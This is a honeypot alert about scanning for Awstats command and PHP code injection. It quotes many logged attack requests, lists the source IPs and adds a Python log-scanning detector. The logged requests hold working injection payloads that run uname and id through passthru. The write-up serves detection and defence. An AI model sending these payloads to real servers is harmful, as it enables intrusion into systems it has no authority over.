
[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected

Our daily web honeypot analysis has detected an increase in scanning for command injection flaws in the Awstats package. Here are example attacks from the logs:

GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1

According to OSVDB, there are two different vulnerabilities that the scanners are probing for:

Both of these vulnerability disclosures are old (2005 and 2008), so we are unsure why there is a sudden uptick in scanning. If you are running Awstats, make sure you are on a current version: http://awstats.sourceforge.net/

Scanning Source Information

The scanning came from 59 different IP addresses (a few resolved to hostnames):

114.32.226.22
118.122.178.65
118.97.50.11
121.166.70.252
122.255.96.164
122.255.96.45
151.1.183.216
159.213.90.53
162-119-162-69.reverse.lstn.net
180.76.5.49
180.76.5.91
187.45.213.158
190.40.2.40
190.95.200.250
200.175.53.196
202.100.80.21
202.28.37.63
203.142.24.17
211.144.82.8
211.167.110.2
212.252.120.11
212.49.222.82
212.92.13.110
213.195.75.188
219.94.144.230
220.162.244.251
220.179.64.23
58.254.143.204
58.254.202.103
58.63.241.209
59.108.108.100
59.163.254.18
61.19.45.119
62.183.105.164
62.225.155.90
65.255.176.26
67.55.95.132
68.78.199.247
69.162.119.162
78.131.55.172
80.248.214.103
81.169.165.138
81.92.159.194
82.193.36.98
82.228.250.163
85.18.206.228
85.88.195.34
85.88.195.35
87.242.99.166
88.173.34.144
88.40.179.242
89-97-247-147.ip2.fastwebnet.it
89.208.95.130
93.84.116.216
95.87.194.7
byr09a.trigger.co.za
mail.gymnaziumdc.cz
mail.ring.hu
pd5cdac.szokff01.ap.so-net.ne.jp

While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0.

This leads us to believe that the scanning was carried out by the same source client.
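As an added example (not part of the original alert, and not honeypot code from the authors), the following Python script shows how a defender could pick these probes out of ordinary web server logs: it parses Common Log Format lines, flags the two request patterns quoted in the log excerpt above (shell metacharacters in the configdir parameter of awstats.pl, and PHP code-evaluation syntax in the sort parameter of awstatstotals.php), and then tallies source IPs and User-Agent strings, which is the same per-source and per-UA view the two preceding sections reason from. The log lines, source IPs and timestamps are constructed for the example; only the request targets are taken from the alert.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Constructed sample access log (Common Log Format with referer and user-agent).
# Request targets are copied from the alert; IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Dec/2011:10:01:02 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.0.113.10 - - [12/Dec/2011:10:01:03 +0000] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
198.51.100.7 - - [12/Dec/2011:10:05:44 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
192.0.2.55 - - [12/Dec/2011:10:07:00 +0000] "GET /awstats/awstats.pl?config=example.com&output=main HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/8.0"
192.0.2.56 - - [12/Dec/2011:10:08:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.21.0"
"""

# One Common Log Format line with the two trailing quoted fields (referer, UA).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A legitimate configdir is a directory path; any shell metacharacter in it
# is the signature of the awstats.pl command injection probe.
SHELL_META = re.compile(r'[|;`$&<>\n]')
# PHP variable-interpolation / evaluation syntax has no place in a sort column name.
PHP_EVAL = re.compile(r'\$\{|\{\$|\b(passthru|system|exec|shell_exec)\s*\(', re.I)


def parse_query(query):
    """Split a query string on '&' only and percent-decode each value.

    Deliberately not urllib.parse.parse_qs: older versions also split on ';',
    which would chop the injected command apart before we inspect it.
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(target):
    """Return a label for the Awstats probe pattern in a request target, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_query(parts.query)
    if path.endswith('awstats.pl'):
        for value in params.get('configdir', []):
            if SHELL_META.search(value):
                return 'awstats.pl configdir command injection'
    if path.endswith('awstatstotals.php'):
        for value in params.get('sort', []):
            if PHP_EVAL.search(value):
                return 'awstatstotals.php sort code injection'
    return None


def scan(log_text):
    """Return one dict per log line that matches a known Awstats probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, or a malformed line; skip rather than crash
        label = classify(m['target'])
        if label:
            hits.append({'ip': m['ip'], 'ua': m['ua'], 'label': label,
                         'target': m['target']})
    return hits


def summarize(hits):
    """Tally hits by pattern, distinct source, and User-Agent string."""
    return {
        'by_label': Counter(h['label'] for h in hits),
        'sources': sorted({h['ip'] for h in hits}),
        'user_agents': Counter(h['ua'] for h in hits),
    }


if __name__ == '__main__':
    report = summarize(scan(SAMPLE_LOG))
    for label, n in report['by_label'].items():
        print(f'{n:3d}  {label}')
    print('sources:', ', '.join(report['sources']))
    for ua, n in report['user_agents'].items():
        print(f'{n:3d}  UA: {ua}')
```

The decode-then-inspect order matters: the sort payload arrives almost entirely percent-encoded, so a pattern match on the raw request line would miss it. Feeding a real access log in through `scan()` produces the same three-part report the alert gives: which pattern, how many distinct sources, and whether one User-Agent string ties them together.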
